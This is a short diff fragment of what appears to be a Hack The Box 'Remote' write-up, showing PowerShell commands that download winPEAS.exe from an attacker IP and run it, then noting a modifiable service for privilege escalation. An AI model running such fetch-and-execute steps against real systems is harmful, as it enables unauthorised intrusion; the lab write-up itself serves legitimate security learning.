ColdFusionX/ColdFusionX.github.io/_posts/2020-09-07-RemoteHTB.md

 PS C:\Windows\Temp> iwr -uri http://10.10.14.14:8000/winPEAS.exe -o winpeas.exe
 PS C:\Windows\Temp> ./winpeas.exe
 ```
-1. Looking at the output of `winPEAS.exe`, two things seemed intresting to me:
+Looking at the output of `winPEAS.exe`, two things seemed interesting to me:

+- First, We have full to a service named as `UsoSvC`

 ```console
 [+] Modifiable Services